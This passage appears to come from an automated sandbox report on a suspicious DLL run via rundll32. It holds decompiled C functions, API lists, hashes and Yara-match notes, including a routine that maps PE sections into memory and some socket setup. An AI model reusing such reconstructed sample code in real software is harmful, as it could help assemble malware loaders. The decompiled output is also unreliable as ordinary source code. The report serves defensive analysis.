                                                                                                        • Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 245 1001a305-1001a323 HeapCreate 246 1001a325-1001a327 245->246 247 1001a328-1001a335 call 1001a2aa 245->247 250 1001a337-1001a344 call 1001a57a 247->250 251 1001a35b-1001a35e 247->251 250->251 254 1001a346-1001a359 HeapDestroy 250->254 254->246
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001A305(intOrPtr _a4) {
                                                                                                        				void* _t6;
                                                                                                        				intOrPtr _t7;
                                                                                                        				void* _t10;
                                                                                                        
                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                        				 *0x1005ad4c = _t6;
                                                                                                        				if(_t6 != 0) {
                                                                                                        					_t7 = E1001A2AA(__eflags);
                                                                                                        					__eflags = _t7 - 3;
                                                                                                        					 *0x1005c984 = _t7;
                                                                                                        					if(_t7 != 3) {
                                                                                                        						L5:
                                                                                                        						__eflags = 1;
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						_t10 = E1001A57A(0x3f8);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 != 0) {
                                                                                                        							goto L5;
                                                                                                        						} else {
                                                                                                        							HeapDestroy( *0x1005ad4c);
                                                                                                        							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}






                                                                                                        0x1001a316
                                                                                                        0x1001a31e
                                                                                                        0x1001a323
                                                                                                        0x1001a328
                                                                                                        0x1001a32d
                                                                                                        0x1001a330
                                                                                                        0x1001a335
                                                                                                        0x1001a35b
                                                                                                        0x1001a35d
                                                                                                        0x1001a35e
                                                                                                        0x1001a337
                                                                                                        0x1001a33c
                                                                                                        0x1001a341
                                                                                                        0x1001a344
                                                                                                        0x00000000
                                                                                                        0x1001a346
                                                                                                        0x1001a34c
                                                                                                        0x1001a352
                                                                                                        0x00000000
                                                                                                        0x1001a352
                                                                                                        0x1001a344
                                                                                                        0x1001a325
                                                                                                        0x1001a325
                                                                                                        0x1001a327
                                                                                                        0x1001a327

                                                                                                        APIs
                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
                                                                                                        • HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$CreateDestroy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3296620671-0
                                                                                                        • Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                        • Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
                                                                                                        • Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                        • Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 255 10002010-1000203e 256 10002052-1000205e 255->256 257 10002064-1000206b 256->257 258 10002156 256->258 260 100020d3-100020ee call 10001fe0 257->260 261 1000206d-1000207a 257->261 259 1000215b-1000215e 258->259 270 100020f0-100020f2 260->270 271 100020f4-10002119 VirtualAlloc 260->271 263 1000207c-1000209e VirtualAlloc 261->263 264 100020ce 261->264 265 100020a0-100020a2 263->265 266 100020a7-100020cb call 10001e10 263->266 264->256 265->259 266->264 270->259 273 1000211b-1000211d 271->273 274 1000211f-1000214e call 10001e60 271->274 273->259 274->258
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				void* _v12;
                                                                                                        				long _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t76;
                                                                                                        				void* _t127;
                                                                                                        
                                                                                                        				_v28 = __ecx;
                                                                                                        				_t3 = _a16 + 4; // 0x104e9
                                                                                                        				_v20 =  *_t3;
                                                                                                        				_t7 =  *_a16 + 0x14; // 0x4a8bb445
                                                                                                        				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
                                                                                                        				_v24 =  *_a16 + _t9;
                                                                                                        				_v8 = 0;
                                                                                                        				while(1) {
                                                                                                        					_t17 =  *_a16 + 6; // 0xe9000001
                                                                                                        					if(_v8 >= ( *_t17 & 0x0000ffff)) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					if( *(_v24 + 0x10) != 0) {
                                                                                                        						_t41 = _v24 + 0x14; // 0x4a8bb445
                                                                                                        						_t43 = _v24 + 0x10; // 0x8b118bbc
                                                                                                        						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
                                                                                                        							_t47 = _v24 + 0x10; // 0x8b118bbc
                                                                                                        							_t50 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
                                                                                                        							_v12 = _t76;
                                                                                                        							if(_v12 != 0) {
                                                                                                        								_t55 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        								_v12 = _v20 +  *_t55;
                                                                                                        								_t58 = _v24 + 0x10; // 0x8b118bbc
                                                                                                        								_t61 = _v24 + 0x14; // 0x4a8bb445
                                                                                                        								E10001E60(_v12, _a4 +  *_t61,  *_t58);
                                                                                                        								_t127 = _t127 + 0xc;
                                                                                                        								 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                        								L1:
                                                                                                        								_v8 = _v8 + 1;
                                                                                                        								_v24 = _v24 + 0x28;
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                                                                                                        					if(_v16 <= 0) {
                                                                                                        						L8:
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t28 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
                                                                                                        					if(_v12 != 0) {
                                                                                                        						_t33 = _v24 + 0xc; // 0x4d8b0000
                                                                                                        						_v12 = _v20 +  *_t33;
                                                                                                        						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                        						E10001E10(_v12, 0, _v16);
                                                                                                        						_t127 = _t127 + 0xc;
                                                                                                        						goto L8;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}











                                                                                                        0x10002016
                                                                                                        0x1000201c
                                                                                                        0x1000201f
                                                                                                        0x1000202c
                                                                                                        0x10002030
                                                                                                        0x10002034
                                                                                                        0x10002037
                                                                                                        0x10002052
                                                                                                        0x10002057
                                                                                                        0x1000205e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000206b
                                                                                                        0x100020d6
                                                                                                        0x100020dc
                                                                                                        0x100020ee
                                                                                                        0x100020fe
                                                                                                        0x10002108
                                                                                                        0x1000210c
                                                                                                        0x10002112
                                                                                                        0x10002119
                                                                                                        0x10002125
                                                                                                        0x10002128
                                                                                                        0x1000212e
                                                                                                        0x10002138
                                                                                                        0x10002140
                                                                                                        0x10002145
                                                                                                        0x1000214e
                                                                                                        0x10002040
                                                                                                        0x10002046
                                                                                                        0x1000204f
                                                                                                        0x00000000
                                                                                                        0x1000204f
                                                                                                        0x00000000
                                                                                                        0x1000211b
                                                                                                        0x00000000
                                                                                                        0x100020f0
                                                                                                        0x10002073
                                                                                                        0x1000207a
                                                                                                        0x100020ce
                                                                                                        0x00000000
                                                                                                        0x100020ce
                                                                                                        0x1000208d
                                                                                                        0x10002097
                                                                                                        0x1000209e
                                                                                                        0x100020ad
                                                                                                        0x100020b0
                                                                                                        0x100020b9
                                                                                                        0x100020c6
                                                                                                        0x100020cb
                                                                                                        0x00000000
                                                                                                        0x100020cb
                                                                                                        0x00000000
                                                                                                        0x100020a0
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
                                                                                                        • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                        • Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
                                                                                                        • Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                        • Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 277 10008860-1000887a call 1001703b 280 10008883-10008897 277->280 281 1000887c-10008881 277->281 283 100088ab-100088b2 280->283 282 100088db-100088de 281->282 284 100088b4-100088bc 283->284 285 100088be-100088c2 call 10016380 283->285 284->283 288 100088c7-100088d0 285->288 289 100088d2-100088d4 288->289 290 100088d6 288->290 289->282 290->282
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 1000886B
                                                                                                          • Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
                                                                                                          • Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
                                                                                                          • Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 501242067-0
                                                                                                        • Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                        • Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
                                                                                                        • Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                        • Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 291 30ad11a-30ad1bb call 309eb52 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 030AD1B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.303934318.0000000003090000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.303955009.00000000030B6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_3090000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction ID: 80b0efb8e8ab0e9eb10285f7ae74b6c01efad6310d180aff3b0f5064d6f01d88
                                                                                                        • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction Fuzzy Hash: 851112B1C4130CEBDB44DFE5D94A6DEFBB0EB00708F108588D521B6240D3B89B489F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 309 30b061d-30b06eb call 30afe29 call 309eb52 lstrcmpiW
                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 030B06E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.303934318.0000000003090000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.303955009.00000000030B6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_3090000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction ID: d328a37836aa2bc6c64c397ddff18c0259d40cd1809171e887f2dac724e0264a
                                                                                                        • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction Fuzzy Hash: 2A2110B5C0130AABCF14DFA9D9899DEBFB5FB20354F108298E529A6251D3B48B04CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        APIs
                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 100011F1
                                                                                                        • _memset.LIBCMT ref: 10001205
                                                                                                        • htonl.WS2_32(00000000), ref: 1000121B
                                                                                                        • htons.WS2_32(?), ref: 1000122F
                                                                                                        • socket.WS2_32(00000002,00000002,00000000), ref: 10001245
                                                                                                        • bind.WS2_32(?,?,00000010), ref: 1000126A
                                                                                                        • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1003240404-0
                                                                                                        • Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                        • Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
                                                                                                        • Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                        • Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E10008B90(intOrPtr __ecx) {
                                                                                                        				int _v8;
                                                                                                        				int _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				char _v28;
                                                                                                        				signed int _v32;
                                                                                                        				struct HDC__* _v120;
                                                                                                        				char _v124;
                                                                                                        				int _v128;
                                                                                                        				int _v132;
                                                                                                        				int _v136;
                                                                                                        				struct HICON__* _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t37;
                                                                                                        				int _t40;
                                                                                                        				void* _t41;
                                                                                                        				void* _t66;
                                                                                                        				struct tagRECT* _t82;
                                                                                                        				void* _t84;
                                                                                                        				void* _t85;
                                                                                                        				signed int _t86;
                                                                                                        
                                                                                                        				_t37 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v32 = _t37 ^ _t86;
                                                                                                        				_v144 = __ecx;
                                                                                                        				_t40 = IsIconic( *(_v144 + 0x20));
                                                                                                        				_t87 = _t40;
                                                                                                        				if(_t40 == 0) {
                                                                                                        					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
                                                                                                        				} else {
                                                                                                        					_push(_v144);
                                                                                                        					E10013247(_t66,  &_v124, _t84, _t85, _t87);
                                                                                                        					_t88 =  &_v124;
                                                                                                        					if( &_v124 != 0) {
                                                                                                        						_v136 = _v120;
                                                                                                        					} else {
                                                                                                        						_v136 = 0;
                                                                                                        					}
                                                                                                        					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
                                                                                                        					_v128 = GetSystemMetrics(0xb);
                                                                                                        					_v132 = GetSystemMetrics(0xc);
                                                                                                        					_t82 =  &_v28;
                                                                                                        					GetClientRect( *(_v144 + 0x20), _t82);
                                                                                                        					asm("cdq");
                                                                                                        					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
                                                                                                        					asm("cdq");
                                                                                                        					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
                                                                                                        					_v140 =  *((intOrPtr*)(_v144 + 0x188));
                                                                                                        					_t79 = _v8;
                                                                                                        					DrawIcon(_v120, _v12, _v8, _v140);
                                                                                                        					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
                                                                                                        				}
                                                                                                        				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
                                                                                                        			}


























                                                                                                        0x10008b99
                                                                                                        0x10008ba0
                                                                                                        0x10008ba3
                                                                                                        0x10008bb3
                                                                                                        0x10008bb9
                                                                                                        0x10008bbb
                                                                                                        0x10008c94
                                                                                                        0x10008bc1
                                                                                                        0x10008bc7
                                                                                                        0x10008bcb
                                                                                                        0x10008bd3
                                                                                                        0x10008bd5
                                                                                                        0x10008be6
                                                                                                        0x10008bd7
                                                                                                        0x10008bd7
                                                                                                        0x10008bd7
                                                                                                        0x10008c01
                                                                                                        0x10008c0f
                                                                                                        0x10008c1a
                                                                                                        0x10008c1d
                                                                                                        0x10008c2b
                                                                                                        0x10008c3d
                                                                                                        0x10008c42
                                                                                                        0x10008c51
                                                                                                        0x10008c56
                                                                                                        0x10008c65
                                                                                                        0x10008c72
                                                                                                        0x10008c7e
                                                                                                        0x10008c87
                                                                                                        0x10008c87
                                                                                                        0x10008ca6

                                                                                                        APIs
                                                                                                        • IsIconic.USER32(?), ref: 10008BB3
                                                                                                          • Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
                                                                                                          • Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A
                                                                                                        • SendMessageA.USER32 ref: 10008C01
                                                                                                        • GetSystemMetrics.USER32 ref: 10008C09
                                                                                                        • GetSystemMetrics.USER32 ref: 10008C14
                                                                                                        • GetClientRect.USER32 ref: 10008C2B
                                                                                                        • DrawIcon.USER32 ref: 10008C7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1007970657-0
                                                                                                        • Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                        • Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
                                                                                                        • Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                        • Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 73%
                                                                                                        			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v284;
                                                                                                        				char _v288;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t9;
                                                                                                        				intOrPtr* _t18;
                                                                                                        				void* _t26;
                                                                                                        				void* _t27;
                                                                                                        				void* _t33;
                                                                                                        				signed int _t34;
                                                                                                        				void* _t35;
                                                                                                        				signed int _t36;
                                                                                                        				void* _t37;
                                                                                                        
                                                                                                        				_t33 = __edi;
                                                                                                        				_t32 = __edx;
                                                                                                        				_t28 = __ecx;
                                                                                                        				_t26 = __ebx;
                                                                                                        				_t9 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t9 ^ _t36;
                                                                                                        				_t39 = _a4 - 0x800;
                                                                                                        				_t35 = __ecx;
                                                                                                        				if(_a4 != 0x800) {
                                                                                                        					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						goto L2;
                                                                                                        					} else {
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
                                                                                                        					E10009BC7(__ebx, _t28, __edi, _t35);
                                                                                                        					_t37 = _t37 + 0x10;
                                                                                                        					L2:
                                                                                                        					_push(_t26);
                                                                                                        					_push(_t33);
                                                                                                        					_t34 =  *(E10017D62(_t39));
                                                                                                        					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
                                                                                                        					_t35 = 0x112;
                                                                                                        					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                        					_t18 = E10017D62(_t39);
                                                                                                        					_t40 =  *_t18;
                                                                                                        					if( *_t18 == 0) {
                                                                                                        						 *(E10017D62(__eflags)) = _t34;
                                                                                                        					} else {
                                                                                                        						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
                                                                                                        					}
                                                                                                        					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                        						_t12 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					} else {
                                                                                                        						_t12 = LoadLibraryA( &_v284);
                                                                                                        					}
                                                                                                        					_pop(_t33);
                                                                                                        					_pop(_t26);
                                                                                                        				}
                                                                                                        				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                        			}

















                                                                                                        0x1000a803
                                                                                                        0x1000a803
                                                                                                        0x1000a803
                                                                                                        0x1000a803
                                                                                                        0x1000a80c
                                                                                                        0x1000a813
                                                                                                        0x1000a816
                                                                                                        0x1000a81e
                                                                                                        0x1000a826
                                                                                                        0x1000a89a
                                                                                                        0x1000a89c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a89e
                                                                                                        0x1000a828
                                                                                                        0x1000a835
                                                                                                        0x1000a836
                                                                                                        0x1000a83b
                                                                                                        0x1000a83e
                                                                                                        0x1000a83e
                                                                                                        0x1000a83f
                                                                                                        0x1000a845
                                                                                                        0x1000a84c
                                                                                                        0x1000a85c
                                                                                                        0x1000a871
                                                                                                        0x1000a873
                                                                                                        0x1000a878
                                                                                                        0x1000a87b
                                                                                                        0x1000a8a5
                                                                                                        0x1000a87d
                                                                                                        0x1000a884
                                                                                                        0x1000a889
                                                                                                        0x1000a8aa
                                                                                                        0x1000a8bf
                                                                                                        0x1000a8bf
                                                                                                        0x1000a8b0
                                                                                                        0x1000a8b7
                                                                                                        0x1000a8b7
                                                                                                        0x1000a8c1
                                                                                                        0x1000a8c2
                                                                                                        0x1000a8c2
                                                                                                        0x1000a8cf

                                                                                                        APIs
                                                                                                        • _strcpy_s.LIBCMT ref: 1000A830
                                                                                                          • Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                          • Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62
                                                                                                        • __snprintf_s.LIBCMT ref: 1000A869
                                                                                                          • Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1000A8B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
